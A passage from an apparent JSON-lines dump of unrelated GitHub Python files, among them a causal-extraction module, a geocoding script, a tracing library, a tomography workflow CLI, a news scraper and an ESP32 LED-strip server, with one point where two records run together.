triggers?\n ## Soft triggers\n preventive = ['prevent', 'limit', 'restrict', 'constrain', 'block', 'bind', 'regulate']\n quantitative_triggers = ['increase', 'decrease', 'reduce', 'boost', 'drop']\n # Hard or soft?\n correlation = ['relate', 'influence', 'correlate']\n for index in range(len(lemmas)):\n lemma= lemmas[index]\n if lemma in causal['CauseEffect']:\n if 'by' in lemmas[index+1:]:\n triggers.append((index, \"right\", 'CausalRelation'))\n else:\n triggers.append((index, \"left\", 'CausalRelation'))\n elif lemma in causal['EffectCause']:\n triggers.append((index, 'right', 'CausalRelation'))\n elif lemma in preventive:\n if pos[index] in verb_tags:\n if 'by' in lemmas[index + 1:]:\n triggers.append((index, \"right\", 'PreventRelation'))\n else:\n triggers.append((index, \"left\", 'PreventRelation'))\n elif lemma in correlation:\n triggers.append((index, \"left\", 'CorrelateRelation'))\n elif lemma in quantitative_triggers:\n triggers.append((index, \"left\", 'Increase/Decrease'))\n for span in self.events2:\n index=self.events2[span]['index']\n triggers.append((index, \"left\", \"Catalyst/Mitigator/Precondition\"))\n return triggers\n\n def set_bounds(self):\n bounds={}\n bound_index = [-1, len(self.tokens)] ###Changed that\n for trigger in self.triggers:\n index= trigger[0]\n bound_index.append(index)\n bounds[index]= {\"trigger\": trigger}\n bound_index.sort()\n for i in range(1, len(bound_index)-1):\n bound= bound_index[i]\n prev= bound_index[i-1]\n next= bound_index[i+1]\n bounds[bound].update({'curr': bound, \"prev\": prev, \"next\": next})\n return bounds\n\n def get_causal_nodes(self, entity_replacement=False):\n ##Use also Entities as potential nodes, in case that we cannot locate an Event as cause/effect\n causal_links=[]\n for b in self.bounds.keys():\n bound= self.bounds[b]\n trigger, direction, causal_type= bound['trigger']\n cause, effect= self.locate_events(bound, direction) ##Left is default: cause, relation, effect\n cause_index, cause_text = self.format(cause)\n effect_index, effect_text= self.format(effect)\n if entity_replacement:\n if len(effect_index)== 0:\n cause, effect = self.locate_events(bound, direction)\n effect_index, effect_text = self.format(effect)\n elif len(cause_index)==0:\n cause, effect = self.locate_events(bound, 
direction)\n                cause_index, cause_text = self.format(cause)\n            if cause_index!= '' and effect_index!= '':\n                trigger_text= self.tokens[trigger]\n                causal_links.append({'trigger': trigger_text, 'cause': (cause_index, cause_text),\n                                     'effect': (effect_index, effect_text), 'type': causal_type})\n        return causal_links\n\n    def locate_events(self, bound, direction):\n        keys = self.events.keys()\n        left_events=[]\n        right_events=[]\n        for span in keys:\n            event = self.events[span]\n            #index = self.sentence.index(event['trigger'])\n            event_text= event['trigger'].split(' ')[0]\n            index= self.tokens.index(event_text)\n            if len(set(event['frame_FN']).intersection(set(self.report_frames))) >0:\n                continue\n            if index>bound['prev'] and index<bound['curr']:\n                left_events.append(span)\n            elif index<bound['next'] and index>bound['curr']:\n                right_events.append(span)\n        if direction=='left':\n            return left_events, right_events\n        return right_events, left_events","repo_name":"spilioeve/WM-src","sub_path":"sofia/causal_extraction.py","file_name":"causal_extraction.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"69916588965","text":"\r\n\"\"\"\r\nTask 1\r\n\r\nExample input file:\r\n    ab\r\n    c\r\n    dde\r\n    ff\r\n\"\"\"\r\n\r\n\r\ndef task_1():\r\n    lines = []\r\n    file = open('input_f.txt', 'r')\r\n    file2 = open('res_f.txt', 'w')\r\n\r\n    for line in file:\r\n        lines.append(line.replace('\\n', ''))\r\n    print(lines)\r\n\r\n    for line in reversed(lines):\r\n        file2.write(line)\r\n        file2.write('\\n')\r\n    file.close()\r\n    file2.close()\r\n\r\n\r\n# Find files in directories\r\ndef task_2():\r\n    import os\r\n    res_file = open('res_f.txt', 'w')\r\n    folder = input(\"Input name folder for work: \")\r\n    catch_py = 0\r\n    for current_dir, dirs, files in os.walk(folder):\r\n        for file in files:\r\n            if (file.rfind('y') == len(file) - 1) and catch_py != 1:\r\n                catch_py = 1\r\n                res_file.write(current_dir)\r\n                res_file.write('\\n')\r\n        catch_py = 0\r\n    res_file.close()\r\n\r\n\r\n# Task 3 LAMBDA\r\ndef mod_checker(x, mod=0):\r\n    return lambda y: y % x == mod\r\n\r\n# task_1()\r\n# task_2()","repo_name":"eiire/PythonStudy","sub_path":"Basics_and_application/standard_python_capabilities/2.4_files.py","file_name":"2.4_files.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4066006232","text":"import pandas as pd\nimport googlemaps\nfrom tqdm import tqdm\n\ntqdm.pandas()\nkey =\"\"\n\n\ngmaps_key = googlemaps.Client(key=key)\n\ndef geocode(add):\n    g = gmaps_key.geocode(add)\n    lat = g[0][\"geometry\"][\"location\"][\"lat\"]\n    lng = g[0][\"geometry\"][\"location\"][\"lng\"]\n    return (lat,lng)\n    \ndef full_address(add, city):\n    return add + \", \" + city + \", PA\"\n\ndef main():\n    data = pd.read_csv('sideyard473.csv',encoding=\"ISO-8859-1\")\n    df = data.copy()\n    \n    df['property_address'] = df['Property_Address']\n    df = df.drop(['Property_Address'], axis=1)\n    \n    \n    df['full_address'] = df.progress_apply(lambda x: full_address(x['property_address'], x['City']), axis=1)\n    df = df.drop(['City'], axis=1)\n\n    df['coords'] = df['full_address'].apply(geocode)\n\n    df.to_csv(\"sideyards_coords.csv\")\n    \nmain()","repo_name":"ncote3/phl-bank-lien-parcel-analysis","sub_path":"parcel_coords.py","file_name":"parcel_coords.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41551358069","text":"import datetime\nimport sys\nimport uuid\nfrom 
pathlib import Path\nfrom typing import List\n\nfrom pycrunch_trace.client.command_buffer import ArrayCommandBuffer\nfrom pycrunch_trace.client.networking import event_queue\nfrom pycrunch_trace.filters import CustomFileFilter\nfrom pycrunch_trace.oop import File, Clock, SafeFilename\nfrom pycrunch_trace.tracing.inline_profiler import inline_profiler_instance\n\nimport pyximport\npyximport.install()\nfrom pycrunch_trace.native.native_tracer import NativeTracer\n\nfrom pycrunch_trace.tracing.simple_tracer import SimpleTracer\n\n\nclass Trace:\n clock: Clock\n _tracer: SimpleTracer\n\n def __init__(self):\n self.default_host = 'http://0.0.0.0:8080'\n self.command_buffer = ArrayCommandBuffer()\n self.is_tracing = False\n self.session_name = None\n self._tracer = None\n # self._client: network_client.TracingClient = None\n self.clock = None\n self.host = None\n self.outgoingQueue = None\n\n def generate_session_name(self) -> str:\n iso_time = datetime.datetime.now().replace(microsecond=0).isoformat()\n return f'{iso_time}_{str(uuid.uuid4())[:5]}'\n\n def start(self, session_name: str = None, host: str = None, profile_name: str = None, additional_excludes: List[str] = None):\n\n if self.is_tracing:\n raise Exception('PyCrunch tracer ERROR: tracing already started')\n\n self.prepare_state(host, session_name)\n self.warn_if_another_tracing_set()\n\n if not profile_name:\n profile_name = 'default.profile.yaml'\n package_directory = Path(__file__).parent.parent.parent\n file_filter = CustomFileFilter(File(package_directory.joinpath('pycrunch-profiles', profile_name)))\n file_filter._ensure_loaded()\n\n if additional_excludes is not None:\n file_filter.add_additional_exclusions(additional_excludes)\n\n self.start_queue()\n\n self.clock = Clock()\n # todo maybe move command buffer to tracer?\n # self._tracer = SimpleTracer(self.command_buffer, self.session_name, f_filter, self.clock, self.outgoingQueue)\n # TODO windows test\n self._tracer = NativeTracer(self.session_name, self.outgoingQueue, file_filter)\n self.outgoingQueue.start()\n\n self.outgoingQueue.tracing_will_start(self.session_name)\n\n # also trace parent function\n sys._getframe().f_back.f_trace = self._tracer.simple_tracer\n\n sys.settrace(self._tracer.simple_tracer)\n\n self.is_tracing = True\n\n def start_queue(self):\n self.outgoingQueue = event_queue\n self.outgoingQueue.start()\n\n def warn_if_another_tracing_set(self):\n if sys.gettrace():\n # there is already trace\n print('PyCrunch tracer WARNING:')\n print(' -- there is already trace function set. 
')\n print(' -- continuing might result in errors ')\n\n def prepare_state(self, host, session_name):\n if not session_name:\n self.session_name = SafeFilename(self.generate_session_name()).__str__()\n else:\n self.session_name = SafeFilename(session_name).__str__()\n if host:\n self.host = host\n else:\n self.host = self.default_host\n\n def stop(self):\n sys.settrace(None)\n\n inline_profiler_instance.print_timings()\n # import pydevd_pycharm\n # pydevd_pycharm.settrace('localhost', port=44441, stdoutToServer=True, stderrToServer=True)\n print('tracing complete, saving results')\n self.is_tracing = False\n # snapshot.save('a', self.command_buffer)\n local = False\n # local = True\n if local:\n self._tracer.session.buffer_became_available(self.command_buffer)\n self._tracer.session.save()\n\n self._tracer.flush_outstanding_events()\n self._tracer.finalize()\n\n # self._tracer.session.save()\n\n\n # self._client.push_message(self._tracer.session)\n # self._client.disconnect()\n","repo_name":"gleb-sevruk/pycrunch-trace","sub_path":"pycrunch_trace/client/api/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"} +{"seq_id":"11252349206","text":"import requests\n\nfrom justnimbus.exceptions import InvalidClientID, JustNimbusError\nfrom justnimbus.model import JustNimbusModel\n\n\nclass JustNimbusClient:\n def __init__(self, client_id: str, zip_code: str):\n self._client_id = client_id\n self._zip_code = zip_code\n\n def get_data(self) -> JustNimbusModel:\n url = f\"https://dashboard.justnimbus.com/user/view.php?system={self._client_id}&zip={self._zip_code}&output=json\"\n response = requests.get(url=url)\n\n try:\n response.raise_for_status()\n return JustNimbusModel.from_dict(response.json()[0])\n except requests.HTTPError as error:\n if response.status_code == 404:\n raise InvalidClientID(client_id=self._client_id) from error\n raise JustNimbusError() from error\n except LookupError as error:\n raise JustNimbusError() from error\n","repo_name":"kvanzuijlen/justnimbus","sub_path":"src/justnimbus/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29387635278","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport time\nplt.ion()\n\ndef Ax_2d(V,mask):\n #Compute A*x for some potential and mask\n Vuse=V.copy()\n Vuse[mask]=0\n ans=(Vuse[1:-1,:-2]+Vuse[1:-1,2:]+Vuse[2:,1:-1]+Vuse[:-2,1:-1])/4.0\n ans=ans-V[1:-1,1:-1]\n return ans\n\ndef relaxation_method(n,tol):\n #Get initial values for potential and set boundary conditions on the edges\n V=np.zeros([n,n])\n V_true=np.zeros([n,n])\n bc=0*V\n mask=np.zeros([n,n],dtype='bool')\n mask[:,0]=True\n mask[:,-1]=True\n mask[0,:]=True\n mask[-1,:]=True\n\n #Get the indices of a circle in the center of our space, set its potential to be fixed at 1\n r=n//8\n x=np.arange(0,n)\n y=np.arange(0,n)\n cx=len(x)//2\n cy=len(y)//2\n circle_indices=(x[np.newaxis,:]-cx)**2+(y[:,np.newaxis]-cy)**2 < r**2\n bc[circle_indices]=1\n mask[circle_indices]=True\n\n #Compute the true potential\n lamb=-1.0/(np.log((n//2)/r))\n A=1-lamb*np.log(r)\n V_true=lamb*np.log(np.sqrt((x[np.newaxis,:]-cx)**2+(y[:,np.newaxis]-cy)**2))+A\n V_true[mask]=bc[mask]\n\n V=bc.copy()\n\n #Set some initial values\n b=-(bc[1:-1,0:-2]+bc[1:-1,2:]+bc[:-2,1:-1]+bc[2:,1:-1])/4.0\n converged=False\n steps=0\n\n while(not 
converged):\n        #While the residuals are too big, compute the potential and new residuals using the relaxation method\n        V[1:-1,1:-1]=(V[1:-1,0:-2]+V[1:-1,2:]+V[:-2,1:-1]+V[2:,1:-1])/4.0\n        V[mask]=bc[mask]\n        steps+=1\n        r=b-Ax_2d(V,mask)\n        converged=np.sum(r*r) None:\n    if args.template_file is not None:\n        wf = Workflow.construct_from_file(args.template_file)\n        wf.cli()\n    else:\n        wf = Workflow.construct_from_cli()\n    wf.write_to_file(args.output_file, force_overwrite=args.force_overwrite)\n\nconstruct_parser = subparsers.add_parser('construct', help='''Construct a valid Tomo\n    workflow representation on the command line and save it to a file. Optionally use\n    an existing file as a template and/or perform the reconstruction or transfer to Galaxy.''')\nconstruct_parser.set_defaults(func=construct)\nconstruct_parser.add_argument('-t', '--template_file',\n    type=pathlib.Path,\n    required=False,\n    help='''Full or relative template file path for the constructed workflow.''')\nconstruct_parser.add_argument('-f', '--force_overwrite',\n    action='store_true',\n    help='''Use this flag to overwrite the output file if it already exists.''')\nconstruct_parser.add_argument('-o', '--output_file',\n    type=pathlib.Path,\n    help='''Full or relative file path to which the constructed workflow will be written.''')\n\n\n# VALIDATE\ndef validate(args:list) -> bool:\n    try:\n        wf = Workflow.construct_from_file(args.input_file)\n        logger.info(f'Success: {args.input_file} represents a valid Tomo workflow configuration.')\n        return(True)\n    except BaseException as e:\n        logger.error(f'{e.__class__.__name__}: {str(e)}')\n        logger.info(f'''Failure: {args.input_file} does not represent a valid Tomo workflow\n            configuration.''')\n        return(False)\n\nvalidate_parser = subparsers.add_parser('validate',\n    help='''Validate a file as a representation of a Tomo workflow (this is most useful\n    after a .yaml file has been manually edited).''')\nvalidate_parser.set_defaults(func=validate)\nvalidate_parser.add_argument('input_file',\n    type=pathlib.Path,\n    help='''Full or relative file path to validate as a Tomo workflow.''')\n\n\n# CONVERT\ndef convert(args:list) -> None:\n    wf = Workflow.construct_from_file(args.input_file)\n    wf.write_to_file(args.output_file, force_overwrite=args.force_overwrite)\n\nconvert_parser = subparsers.add_parser('convert', help='''Convert one Tomo workflow\n    representation to another. 
File format of both input and output files will be\n automatically determined from the files' extensions.''')\nconvert_parser.set_defaults(func=convert)\nconvert_parser.add_argument('-f', '--force_overwrite',\n action='store_true',\n help='''Use this flag to overwrite the output file if it already exists.''')\nconvert_parser.add_argument('-i', '--input_file',\n type=pathlib.Path,\n required=True,\n help='''Full or relative input file path to be converted.''')\nconvert_parser.add_argument('-o', '--output_file',\n type=pathlib.Path,\n required=True,\n help='''Full or relative file path to which the converted input will be written.''')\n\n\n# DIFF / COMPARE\ndef diff(args:list) -> bool:\n raise ValueError('diff not tested')\n# wf1 = Workflow.construct_from_file(args.file1).dict_for_yaml()\n# wf2 = Workflow.construct_from_file(args.file2).dict_for_yaml()\n# diff = DeepDiff(wf1,wf2,\n# ignore_order_func=lambda level:'independent_dimensions' not in level.path(),\n# report_repetition=True,\n# ignore_string_type_changes=True,\n# ignore_numeric_type_changes=True)\n diff_report = diff.pretty()\n if len(diff_report) > 0:\n logger.info(f'The configurations in {args.file1} and {args.file2} are not identical.')\n print(diff_report)\n return(True)\n else:\n logger.info(f'The configurations in {args.file1} and {args.file2} are identical.')\n return(False)\n\ndiff_parser = subparsers.add_parser('diff', aliases=['compare'], help='''Print a comparison of \n two Tomo workflow representations stored in files. The files may have different formats.''')\ndiff_parser.set_defaults(func=diff)\ndiff_parser.add_argument('file1',\n type=pathlib.Path,\n help='''Full or relative path to the first file for comparison.''')\ndiff_parser.add_argument('file2',\n type=pathlib.Path,\n help='''Full or relative path to the second file for comparison.''')\n\n\n# LINK TO GALAXY\ndef link_to_galaxy(args:list) -> None:\n from .link_to_galaxy import link_to_galaxy\n link_to_galaxy(args.input_file, galaxy=args.galaxy, user=args.user,\n password=args.password, api_key=args.api_key)\n\nlink_parser = subparsers.add_parser('link_to_galaxy', help='''Construct a Galaxy history and link\n to an existing Tomo workflow representations in a NeXus file.''')\nlink_parser.set_defaults(func=link_to_galaxy)\nlink_parser.add_argument('-i', '--input_file',\n type=pathlib.Path,\n required=True,\n help='''Full or relative input file path to the existing Tomo workflow representations as \n a NeXus file.''')\nlink_parser.add_argument('-g', '--galaxy',\n required=True,\n help='Target Galaxy instance URL/IP address')\nlink_parser.add_argument('-u', '--user',\n default=None,\n help='Galaxy user email address')\nlink_parser.add_argument('-p', '--password',\n default=None,\n help='Password for the Galaxy user')\nlink_parser.add_argument('-a', '--api_key',\n default=None,\n help='Galaxy admin user API key (required if not defined in the tools list file)')\n\n\n# RUN THE RECONSTRUCTION\ndef run_tomo(args:list) -> None:\n from .run_tomo import run_tomo\n run_tomo(args.input_file, args.output_file, args.modes, center_file=args.center_file,\n num_core=args.num_core, output_folder=args.output_folder, save_figs=args.save_figs)\n\ntomo_parser = subparsers.add_parser('run_tomo', help='''Construct and add reconstructed tomography\n data to an existing Tomo workflow representations in a NeXus file.''')\ntomo_parser.set_defaults(func=run_tomo)\ntomo_parser.add_argument('-i', '--input_file',\n required=True,\n type=pathlib.Path,\n help='''Full or relative input file path 
containing raw and/or reduced data.''')\ntomo_parser.add_argument('-o', '--output_file',\n    required=True,\n    type=pathlib.Path,\n    help='''Full or relative output file path for the raw and/or reduced data.''')\ntomo_parser.add_argument('-c', '--center_file',\n    type=pathlib.Path,\n    help='''Full or relative input file path containing the rotation axis centers info.''')\n#tomo_parser.add_argument('-f', '--force_overwrite',\n#    action='store_true',\n#    help='''Use this flag to overwrite any existing reduced data.''')\ntomo_parser.add_argument('-n', '--num_core',\n    type=int,\n    default=-1,\n    help='''Specify the number of processors to use.''')\ntomo_parser.add_argument('--output_folder',\n    type=pathlib.Path,\n    default='.',\n    help='Full or relative path to an output folder')\ntomo_parser.add_argument('-s', '--save_figs',\n    choices=['yes', 'no', 'only'],\n    default='no',\n    help='''Specify whether to display ('yes' or 'no'), save ('yes'), or only save ('only').''')\ntomo_parser.add_argument('--reduce_data',\n    dest='modes',\n    const='reduce_data',\n    action='append_const',\n    help='''Use this flag to create and add reduced data to the input file.''')\ntomo_parser.add_argument('--find_center',\n    dest='modes',\n    const='find_center',\n    action='append_const',\n    help='''Use this flag to find and add the calibrated center axis info to the input file.''')\ntomo_parser.add_argument('--reconstruct_data',\n    dest='modes',\n    const='reconstruct_data',\n    action='append_const',\n    help='''Use this flag to create and add reconstructed data to the input file.''')\ntomo_parser.add_argument('--combine_data',\n    dest='modes',\n    const='combine_data',\n    action='append_const',\n    help='''Use this flag to combine reconstructed data and add it to the input file.''')\n\n\nif __name__ == '__main__':\n    args = parser.parse_args(sys.argv[1:])\n\n    # Set log configuration\n    # When logging to file, the stdout log level defaults to WARNING\n    logging_format = '%(asctime)s : %(levelname)s - %(module)s : %(funcName)s - %(message)s'\n    level = logging.getLevelName(args.log_level)\n    if args.log is sys.stdout:\n        logging.basicConfig(format=logging_format, level=level, force=True,\n                handlers=[logging.StreamHandler()])\n    else:\n        if isinstance(args.log, str):\n            logging.basicConfig(filename=f'{args.log}', filemode='w',\n                    format=logging_format, level=level, force=True)\n        elif isinstance(args.log, io.TextIOWrapper):\n            logging.basicConfig(filemode='w', format=logging_format, level=level,\n                    stream=args.log, force=True)\n        else:\n            raise ValueError(f'Invalid argument --log: {args.log}')\n        stream_handler = logging.StreamHandler()\n        logging.getLogger().addHandler(stream_handler)\n        stream_handler.setLevel(logging.WARNING)\n        stream_handler.setFormatter(logging.Formatter(logging_format))\n\n    args.func(args)\n","repo_name":"CHESSComputing/Tomo","sub_path":"workflow/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":10029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19359452385","text":"# -*- coding: utf-8 -*-\nimport re\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom urllib.request import urlopen\n\nfrom bs4 import BeautifulSoup\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import Rule\nfrom news_all.spider_models import NewsRCSpider\n\n\nclass ceweeklySpider(NewsRCSpider):\n\t\"\"\"China Economic Weekly (中国经济周刊)\"\"\"\n\tname = 'ceweekly'\n\n\tmystart_urls = {\n\t\t'http://www.ceweekly.cn/': 560,  # 'Homepage'\n\t\t'http://www.ceweekly.cn/news/comment/': 561,  # 
Commentary\n\t\t'http://www.ceweekly.cn/company/': 562,  # Company\n\t\t'http://www.ceweekly.cn/economic/it/': 563,  # Science & Education\n\t\t'http://www.ceweekly.cn/finance/macro/': 564,  # 'Macro'\n\t\t# from spiders_all\n\t\t# 'http://www.ceweekly.cn/company/': 687,  # Homepage - Company; duplicate of the 562 url, but 687 was not deleted from the mongo source\n\t\t'http://www.ceweekly.cn/area/shanghai/': 688,  # Region - Shanghai\n\t\t'http://www.ceweekly.cn/area/beijing/': 689,  # Region - Beijing\n\t\t'http://www.ceweekly.cn/area/guangdong/': 690,  # Region - Guangdong\n\t\t'http://space.ceweekly.cn/chenweishan': 691,  # Column - Chen Weishan\n\t\t'http://space.ceweekly.cn/chendongdong': 692,  # Column - Chen Dongdong\n\t\t'http://space.ceweekly.cn/niuwenxin': 693,  # Column - Niu Wenxin\n\t\t'http://space.ceweekly.cn/xiewei': 694,  # Column - Xie Wei\n\t\t'http://space.ceweekly.cn/zhangyan': 695,  # Column - Zhang Yan\n\t\t'http://space.ceweekly.cn/zhouqi': 696,  # Column - Zhou Qi\n\t}\n\t# http://www.ceweekly.cn/2019/0305/250830.shtml\n\trules = (Rule(LinkExtractor(allow=r'ceweekly.cn/%s\\d{2}/\\d+.shtml' % datetime.today().strftime('%Y/%m'),\n\t                            deny=('video', 'audio'),\n\t                            # restrict_xpaths=\"//div[@class='column mar-t-10'][2]\" was present before; not in the latest online version (3.14)\n\t                            ),\n\t              callback='parse_item',\n\t              follow=False),\n\t         )\n\n\tdef parse_item(self, response):\n\t\txp = response.xpath\n\t\ttry:\n\t\t\tpubtime = xp('//span[@class=\"date\"]/text()')[0].extract()\n\t\t\ttitle = xp('//h1[@class=\"article-title\"]/text()')[0].extract().strip()\n\t\t\tcontent_div = xp('//div[@class=\"article-content fontSizeSmall BSHARE_POP\"]')[0]\n\t\t\torigin_name = xp(\"//span[@class='source']/text()\").extract_first('')\n\t\t\torigin_name = \"\".join(origin_name.split())\n\t\t\tcontent, media, videos, cover = self.content_clean(content_div, need_video=True, kill_xpaths=[])\n\t\texcept BaseException:\n\t\t\t# return self.produce_debugitem(response, \"xpath error\")\n\t\t\treturn self.parse_item_1(response)\n\n\t\treturn self.produce_item(\n\t\t\tresponse=response,\n\t\t\ttitle=title,\n\t\t\tpubtime=pubtime,\n\t\t\torigin_name=origin_name,\n\t\t\tcontent=content,\n\t\t\tmedia=media,\n\t\t\tvideos=videos\n\t\t)\n\n\tdef parse_item_1(self, response):\n\t\t# http://www.ceweekly.cn/2019/1106/274024.shtml\n\t\tcontent_id_pattern = re.compile(r'\\d{4}/\\d{4}/(.*?).shtml')\n\t\tcontent_id = content_id_pattern.findall(response.url)[0]\n\n\t\t# convert original url to new url (mobile devices)\n\t\t# i.e.: http://app.ceweekly.cn/?app=article&controller=article&action=show&contentid=274024\n\n\t\tnew_url = 'http://app.ceweekly.cn/?app=article&controller=article&action=show&contentid=%s' % content_id\n\n\t\ttry:\n\t\t\thtml = urlopen(new_url)\n\t\t\tbs_obj = BeautifulSoup(html.read())\n\n\t\t\ttitle_div = bs_obj.head.title.get_text().split('-')\n\t\t\ttitle = \"\".join(title_div[0].split())\n\t\t\torigin_name = \"\".join(title_div[1].split())\n\n\t\t\tpub_time = bs_obj.find(\"time\").get_text()\n\n\t\t\tcontent_div = bs_obj.find(\"div\", {\"id\": \"content-show\"})\n\t\t\tcontent, media, _, _ = self.content_clean(str(content_div))\n\n\t\texcept Exception as _:\n\t\t\treturn self.produce_debugitem(response, \"xpath error\")\n\n\t\treturn self.produce_item(\n\t\t\tresponse=response,\n\t\t\ttitle=title,\n\t\t\tpubtime=pub_time,\n\t\t\torigin_name=origin_name,\n\t\t\tcontent=content,\n\t\t\tmedia=media\n\t\t)\n","repo_name":"Pintrue/news_all","sub_path":"news_all/spiders_four/ceweekly.py","file_name":"ceweekly.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"19196538087","text":"import socket, machine, uasyncio, ure\n\nimport 
http_server\n\n\nloop = uasyncio.get_event_loop()\n\n\nclass LEDStripServer(http_server.HTTPServer):\n    def __init__(self):\n        \"\"\"Set up pins and pwm objects\"\"\"\n\n        # Set up regex object to find colour hex strings\n        self.colour_hex_decoder = ure.compile(\"^#[A-Fa-f0-9]+$\")\n\n        super().__init__()\n\n        self.red_pin = machine.Pin(4)\n        self.gre_pin = machine.Pin(16)\n        self.blu_pin = machine.Pin(17)\n\n        self.red_pwm = machine.PWM(self.red_pin)\n        self.red_pwm.duty(0)\n\n        self.gre_pwm = machine.PWM(self.gre_pin)\n        self.gre_pwm.duty(0)\n\n        self.blu_pwm = machine.PWM(self.blu_pin)\n        self.blu_pwm.duty(0)\n\n        # keep this in (red, green, blue) order: decode_hex_colour and the\n        # switch-mode handler both rely on it\n        self.pwm_objects = [self.red_pwm, self.gre_pwm, self.blu_pwm]\n\n        for pwm in self.pwm_objects:\n            pwm.freq(1000)\n\n        self.debug = True\n\n        self.active_task = None\n\n    async def output_hex_colour(self, colour, reader, writer, data_dict):\n        rgb_vals = await self.decode_hex_colour(colour)\n\n        if rgb_vals == []:\n            await self.bad_request(reader, writer, data_dict)\n            return\n\n        mapped_vals = []\n\n        for val in rgb_vals:\n            mapped_val = await self.map(val, 0, 255, 0, 1023)\n            mapped_vals.append(mapped_val)\n\n        for mapped_val, pwm_obj in zip(mapped_vals, self.pwm_objects):\n            pwm_obj.duty(mapped_val)\n\n    async def post_handler(self, data_dict, reader, writer):\n        \"\"\"Sets the behaviour of the LEDs.\n        Looks for a mode then looks for further bits of post data to determine\n        LED state.\n\n        Modes:\n        * switch: \n            - POST data:\n                - red = ON/OFF\n                - gre = ON/OFF\n                - blu = ON/OFF\n\n        * analog:\n            - POST data:\n                - colour = '#RRGGBB' hex string\n\n        * flash:\n            - POST data:\n                - colour_list, on_time_list\n\n        * fade:\n            - POST data:\n                - colour_list, on_time_list, fade_time_list\n        \"\"\"\n        if not \"mode\" in data_dict:\n            await self.bad_request(reader, writer, data_dict)\n            return\n\n        if not data_dict[\"mode\"] in [\"switch\", \"analog\", \"flash\", \"fade\"]:\n            await self.bad_request(reader, writer, data_dict)\n            return\n\n        if self.active_task != None:\n            self.active_task.cancel()\n            self.active_task = None\n\n        if data_dict[\"mode\"] == \"switch\":\n            for led, pwm_obj in zip([\"red\", \"gre\", \"blu\"], self.pwm_objects):\n                if data_dict[led] == \"ON\":\n                    pwm_obj.duty(1023)\n                elif data_dict[led] == \"OFF\":\n                    pwm_obj.duty(0)\n                else:\n                    await self.bad_request(reader, writer, data_dict)\n                    return\n\n        if data_dict[\"mode\"] == \"analog\":\n            if \"colour\" not in data_dict:\n                await self.bad_request(reader, writer, data_dict)\n                return\n\n            await self.output_hex_colour(data_dict[\"colour\"], reader, writer, data_dict)\n\n        if data_dict[\"mode\"] == \"flash\":\n            colour_list = data_dict[\"colour_list\"]\n            on_time_list = data_dict[\"on_time_list\"]\n\n            if len(colour_list) != len(on_time_list) or len(colour_list) < 2:\n                await self.bad_request(reader, writer, data_dict)\n                return\n\n            self.active_task = loop.create_task(\n                self.flash_task(colour_list, on_time_list, reader, writer, data_dict)\n            )\n\n        if data_dict[\"mode\"] == \"fade\":\n            colour_list = data_dict[\"colour_list\"]\n            on_time_list = data_dict[\"on_time_list\"]\n            fade_time_list = data_dict[\"fade_time_list\"]\n\n            if (\n                not len(colour_list) == len(on_time_list) == len(fade_time_list)\n                or len(colour_list) < 2\n            ):\n                await self.bad_request(reader, writer, data_dict)\n                return\n\n            self.active_task = loop.create_task(\n                self.fade_task(\n                    colour_list, on_time_list, fade_time_list, reader, writer, data_dict\n                )\n            )\n\n        await writer.awrite(\"HTTP/1.0 200 OK\\r\\n\")\n\n        await reader.aclose()\n        await writer.aclose()\n\n    async def flash_task(self, colours_list, on_times_list, reader, writer, data_dict):\n        try:\n            while True:\n                for colour, time in zip(colours_list, on_times_list):\n                    await self.output_hex_colour(colour, 
reader, writer, data_dict)\n\n                    await uasyncio.sleep(float(time))\n\n        except uasyncio.CancelledError:\n            raise\n\n    async def fade_task(\n        self, colour_list, on_time_list, fade_time_list, reader, writer, data_dict\n    ):\n        try:\n            while True:\n                for idx, (curr_col, on_time, fade_time) in enumerate(\n                    zip(colour_list, on_time_list, fade_time_list)\n                ):\n\n                    # Get index of next colour\n                    next_idx = idx + 1\n                    if next_idx > len(colour_list) - 1:\n                        next_idx = 0\n\n                    # Set LED vals for on time\n                    await self.output_hex_colour(curr_col, reader, writer, data_dict)\n\n                    await uasyncio.sleep(float(on_time))\n\n                    # Set up the fade\n                    # Get the current colour\n                    curr_rgb_vals = await self.decode_hex_colour(curr_col)\n\n                    # Get the number of 60th-of-a-second increments that occur\n                    # during the fade operation\n                    fade_refresh_rate = 60\n\n                    num_incr = round(float(fade_time) * fade_refresh_rate)\n\n                    next_col = colour_list[next_idx]\n                    next_rgb_vals = await self.decode_hex_colour(next_col)\n\n                    rgb_diffs = [\n                        next_val - curr_val\n                        for next_val, curr_val in zip(next_rgb_vals, curr_rgb_vals)\n                    ]\n\n                    # Run the fade\n                    for count in range(num_incr):\n\n                        # Calculate this count's LED values\n                        fade_vals = [\n                            curr_rgb_val + (rgb_diff * count / num_incr)\n                            for rgb_diff, curr_rgb_val in zip(rgb_diffs, curr_rgb_vals)\n                        ]\n\n                        # Apply these LED values to the strip\n                        mapped_fade_vals = []\n\n                        for fade_val in fade_vals:\n                            mapped_val = round(\n                                await self.map(fade_val, 0, 255, 0, 1023)\n                            )\n                            mapped_fade_vals.append(mapped_val)\n\n                        for val, pwm_obj in zip(mapped_fade_vals, self.pwm_objects):\n                            pwm_obj.duty(val)\n\n                        # Wait for the next increment\n                        await uasyncio.sleep(1 / fade_refresh_rate)\n\n        except uasyncio.CancelledError:\n            raise\n\n    async def decode_hex_colour(self, hex_str):\n        \"\"\"Get three ints corresponding to the r, g and b values encoded in a 